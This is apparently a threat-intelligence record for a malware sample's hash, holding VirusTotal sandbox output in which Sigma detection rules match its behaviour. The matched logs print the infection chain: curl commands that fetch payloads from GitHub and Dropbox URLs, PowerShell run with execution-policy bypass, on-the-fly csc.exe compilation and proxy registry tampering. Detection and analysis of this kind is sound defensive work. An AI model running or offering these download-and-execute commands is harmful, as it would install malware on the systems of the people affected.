d9d7d5feb2abc828b58142fc63509d80
Hash
- MD5: d9d7d5feb2abc828b58142fc63509d80
- SHA1: 77b21660041e26464e94e737babb43ebe95b91f1
- SHA256: 7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48
- First Seen: 2026-05-13
- Last Seen: 2026-05-13
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48"
},
"attributes": {
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "09fa8f2c3e86f0fa6cc0876e94d77a20c07409a7154a61ef64a9a9a31a6d0049",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious File Download From File Sharing Domain Via Curl.EXE",
"rule_description": "Detects potentially suspicious file download from file sharing domains using curl.exe",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "1929e853315b3b5398e0837b2b8928a28ae8eec0611ebb41efc5e6b33e78cd6c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Parameter Substring",
"rule_description": "Detects suspicious PowerShell invocation with a parameter substring",
"rule_author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Dot net compiler compiles file from suspicious location",
"rule_description": "Dot net compiler compiles file from suspicious location",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "8d980d509aaf7ca8f2c6cd9dd23e8ea6eb18328ca64711cb6e059ecec024fe0a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Outbound Network Connection Initiated By Script Interpreter",
"rule_description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "192.168.122.104",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\System32\\WScript.exe",
"SourcePort": "49685",
"DestinationIp": "185.199.111.133"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.108.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.3",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "55798",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "172.16.1.3",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "55799",
"DestinationIp": "104.18.21.213"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
"rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d86dfee683d0e96803dc8a153d15f7208afc774045e2d885ccaec10bdcef7831",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Curl.EXE Download",
"rule_description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1429a6819ff25aad68fb09601fb0b63c4be24919adfd25c4ad925ef8d47d8f22",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "WmiPrvSE Spawned A Process",
"rule_description": "Detects WmiPrvSE spawning a process",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "c7cc4a3a-1524-4be2-8795-14dbaca6cb36",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "77ecce5ea77940e3b7b82f2766d696c4bf16f75a458c3ddfe650f26d4475fa74",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Insecure Transfer Via Curl.EXE",
"rule_description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "884b7e21f67a56fc9cb312bdbc27e658c101c449662b2f9e25fd463a75715971",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Registry Tampering by Potentially Suspicious Processes",
"rule_description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"EventType": "SetValue",
"Details": "DWORD (0x00000001)",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass"
}
},
{
"values": {
"Details": "DWORD (0x00000001)",
"EventType": "SetValue",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
}
},
{
"values": {
"Details": "DWORD (0x00000001)",
"EventID": "13",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet"
}
},
{
"values": {
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\System32\\WScript.exe",
"Details": "DWORD (0x00000000)",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
}
},
{
"values": {
"EventID": "13",
"Details": "(Empty)",
"Image": "C:\\Windows\\System32\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "c7cc4a3a-1524-4be2-8795-14dbaca6cb36",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic .NET Compilation Via Csc.EXE",
"rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
"rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=EB80BB1CA9B9C7F516FF69AFCFD75B7D,SHA256=38C407DBF41E99396B78D00DD796930D8838DCB4AF77C3F23BA0E800D1213EBE,IMPHASH=950FB6F62526333E663D35BA72D19DDC",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentCommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline\"",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "Medium",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
